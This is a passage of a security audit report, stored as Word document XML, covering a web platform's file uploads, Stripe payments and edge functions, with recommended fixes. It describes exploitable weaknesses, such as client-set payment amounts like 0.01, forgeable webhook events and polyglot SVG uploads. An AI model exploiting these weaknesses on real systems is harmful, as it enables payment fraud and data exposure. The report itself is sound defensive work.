        <w:t xml:space="preserve">, or newlines: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csvCell = (v: unknown)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let s = String(v ?? '');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(/^[=+\-@]/.test(s)) s = "'" + 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(/[,"\n]/.test(s)) s = `"${s.replace(/"/g, '""')}"`;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return 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csv = rows.map(r =&gt; r.map(csvCell).join(',')).join('\n');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4.6 LOW — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">dangerouslySetInnerHTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in chart component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src/components/ui/chart.tsx:79</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> injects CSS variables for chart theming. Source is developer-controlled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">ChartConfig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, no user input. No action required, but worth noting for future audits.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4.7 ✅ No </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> injection of UGC found</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The three </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">\.innerHTML\s*=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> matches are React's mount root, a reCAPTCHA container reset, and a hardcoded fallback string for image load failure — all safe.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4.8 ✅ ReactMarkdown configured safely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react-markdown</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is used without </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">rehype-raw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, so embedded HTML is rendered as text. Only the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">href</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attribute path (§4.3) is exposed.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4.9 ✅ Open-redirect surface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src/pages/InviteAcceptPage.tsx:87</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> interpolates only internal route data. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">src/pages/AuthPage.tsx:51-53</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> accepts a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">returnTo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for OAuth flow but feeds it through </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">new URL()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and only uses it to forward an access token — needs a same-origin / allowlist check before the next milestone but isn't currently exploitable end-to-end. Add an allowlist.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File Uploads &amp; Storage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 ⚠️ HIGH — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">profile-assets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bucket is public</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Migration </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">20250615233039_390218c6-af07-41ee-be4d-f0c55efd233b.sql:118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INSERT INTO storage.buckets (id, name, public) VALUES ('profile-assets', 'profile-assets', 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codebase already learned this lesson for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">campaign-deliverables</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (made private, served via signed URLs from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">get-watermarked-preview</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">profile-assets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> should follow the same pattern — at minimum for KYC-adjacent assets like Stripe Connect identity uploads.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switch the bucket to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">public = false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, add storage RLS policies for owner read/write, and serve avatars/logos via short-lived signed URLs (or a dedicated edge function that issues them).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⚠️ HIGH — MIME validation is client-side only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src/lib/storage/uploadProfileAsset.ts:56-62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(!allowedTypes.includes(file.type))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throw new UploadError(`Unsupported format. Please use ${label}.`);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file.type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is whatever the browser supplies; an attacker uploading via raw </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">fetch()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can set it to anything. Combined with §4.4 (SVG allowed) and §5.1 (public bucket), an attacker can store a polyglot SVG and serve it as an image.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add a server-side validator that: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t xml:space="preserve">Reads the first 16 bytes (file magic) and matches against expected formats (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">FF D8 FF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JPEG, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">89 50 4E 47</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PNG, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">47 49 46 38</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GIF, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">52 49 46 46</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WebP, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="20"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Rejects on mismatch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="20"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Optionally re-encodes the image through </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">sharp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (already in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">package.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) to strip metadata + scripts.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cheapest implementation is a small </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">validate-upload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> edge function that the client must call before completing an upload.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LOW-MEDIUM — Filename extension trusted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src/lib/storage/uploadProfileAsset.ts:71-72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ext = file.name.split('.').pop() || 'bin';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path = `${userId}/${kind}-${Date.now()}.${ext}`;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a directory-traversal risk (the path is namespaced under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">userId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), but the extension can be anything. Whitelist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">[jpg, jpeg, png, webp, gif]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> server-side.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5.4 ✅ Watermarked-preview signed URL expiry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supabase/functions/get-watermarked-preview/index.ts:173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expirySeconds = canDownload ? 3600 : 900;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15 min for previews, 1 h for authorized downloads — sane. Confirm the function checks the requester is the owning business or the assigned creator (not just any authenticated user).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Stripe Payments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 🔴 CRITICAL — Amount tampering in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">create-sponsorship-checkout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supabase/functions/create-sponsorship-checkout/index.ts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{ sponsorshipId, amount, campaignTitle } = await req.json();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platformFee = Math.round(amount * PLATFORM_FEE_RATE * 100);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totalAmount = Math.round(amount * 100);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amount is taken straight from the client, converted to cents, and sent to Stripe. A brand can submit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">amount: 0.01</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and pay $0.01 instead of the agreed-on sponsorship price.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look the sponsorship up by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">sponsorshipId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, take the amount from the row, and ignore the client value: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{ sponsorshipId } = await req.json();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{ data: sponsorship, error } = await supabase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.from('campaign_sponsorships')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.select('id, sponsorship_amount, campaign_id, brand_id')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.eq('id', sponsorshipId)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.single();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(error || !sponsorship) return new Response('Not found', { status: 404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authorize: confirm requester owns brand_id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totalAmount = Math.round(sponsorship.sponsorship_amount * 100);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Audit every other Stripe-creating edge function for the same pattern: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">create-checkout-session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create-campaign-escrow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boost-payment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. None should accept amounts from the client.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✅ Webhook signature verification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supabase/functions/stripe-webhook/index.ts:45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event = await stripe.webhooks.constructEventAsync(body, signature, webhookSecret);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Correct. Throws on invalid sig.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✅ Idempotency keys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boost-payment/index.ts:118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idempotencyKey: 'boost_pi_${boostId}'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">release-creator-payout/index.ts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'payout_${collaborationId}'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Audit the rest of the Stripe functions to confirm every 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paymentIntents.create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transfers.create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payouts.create</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has one. Without it, retries can double-charge or double-pay.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6.4 ✅ Customer / org ownership check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create-checkout-session/index.ts:68-80</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> verifies the caller is an active org owner before opening the billing portal. Replicate this pattern (membership lookup → role check → only then call Stripe) on every billing/payment edge function.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6.5 ✅ Currency hardcoded to USD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Currency is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">"usd"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> literal across reviewed functions, not from the request body. Good.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6.6 ✅ Test mode confirmed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All Stripe price IDs are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">price_test_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. CLAUDE.md rule held. Before live keys turn on, search the repo one more time for any </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">pk_live_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sk_live_</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> accidents.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Edge Functions (general)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1 ⚠️ HIGH (depending on confirmation) — Toast redemption webhook signature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supabase/functions/toast-redemption-webhook/index.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was not fully verified during the audit. If this endpoint accepts redemption events from Toast without verifying a shared secret, an attacker can post fake redemptions, marking discount codes as redeemed and (depending on logic) triggering payouts.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Action:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> read the file, confirm it validates an HMAC / signature header against Toast's webhook signing secret. If missing, this is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CRITICAL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MEDIUM — No per-user rate limiting on LLM endpoints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chat-assistant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donny-chat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donny-orchestrator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donny-campaign-generate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donny-creator-match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donny-apply-pitch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donny-dragonshare-score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donny-nudge-frame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donny-schedule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donny-toast-context</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> all call paid LLMs (Anthropic / OpenAI). The Pricing PDF says Claude AI is the platform's single largest expense at ~$200/mo today.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single authenticated user looping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">donny-chat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can torch the monthly budget in hours.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add a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">chat_usage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">llm_usage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) table keyed by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">(user_id, hour)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with a count column, and at the top of each LLM edge function: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{ data: usage } = await supabase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.from('llm_usage').select('count').eq('user_id', user.id).eq('hour_bucket', currentHour).single();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((usage?.count ?? 0) &gt;= TIER_LIMIT[tier])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return new Response(JSON.stringify({ error: 'rate_limited' }), { status: 429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Tier limits should match the pricing tiers in the PDF (Free / Starter / Growth / Pro / Enterprise — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">50 / 200 / unlimited</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LLM calls per month).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7.3 MEDIUM — CORS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on every edge function</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every reviewed function ships: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'Access-Control-Allow-Origin': '*',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purely public endpoints this is fine. For authenticated mutations it's a defense-in-depth gap (browsers won't include credentials cross-origin so it's not directly exploitable, but it weakens audit posture and lets attacker sites probe responses with no-cors fetches).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add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">supabase/functions/_shared/cors.ts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ALLOWED = new Set([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'https://dragoncandy.io',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'https://www.dragoncandy.io',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'https://dragoncandy-preview.lovable.app',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const corsHeaders = (req: Request)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origin = req.headers.get('origin') ?? '';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return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'Access-Control-Allow-Origin': ALLOWED.has(origin) ? origin : 'https://dragoncandy.io',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'Access-Control-Allow-Headers': 'authorization, x-client-info, apikey, content-type',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'Access-Control-Allow-Methods': 'POST, OPTIONS',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'Vary': 'Origin',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 it in every function. Do not use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Access-Control-Allow-Credentials: true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> paired with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">*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7.4 LOW-MEDIUM — Input validation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match-creators/index.ts:217</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> accepts </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">{ campaignId }</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and only checks truthiness. Most edge functions don't run a schema validator. Add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">zod</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (or a zero-dep manual validator) for every public-facing function. Bad input today means cryptic 500s; tomorrow it can mean type-confusion bugs.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7.5 ✅ Donny OAuth (3rd-party access provider)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supabase/functions/donny-oauth-token/index.ts:32-38</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> implements PKCE with SHA-256, scope checking via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">_shared/auth.ts:75-77</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, token expiry validation at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">_shared/auth.ts:55</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Migration </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">20260326000000_donny_oauth_codes.sql:32-33</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> allows nullable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">client_secret_hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (correct for public PKCE clients).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Audit gap:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> confirm refresh tokens are single-use and rotated. If the same refresh token can be redeemed twice, a stolen refresh token grants unlimited renewal until expiry.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7.6 ⚠️ Toast OAuth — token storage encryption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supabase/functions/toast-oauth-callback/index.ts:185-201</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stores Toast access/refresh tokens in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">toast_connections</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The audit could not confirm whether the columns use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">pgsodium</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> encryption-at-rest. If they're plaintext, a database breach exposes restaurants' Toast tokens — a path to PII (POS data, customer info) far broader than DragonCandy's own data.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Action:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> read the schema for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">toast_connections</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. If </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">access_token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refresh_token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are plain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:shd w:fill="F1F5F9" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">text</w:t>
      </w:r>
      <w:r>
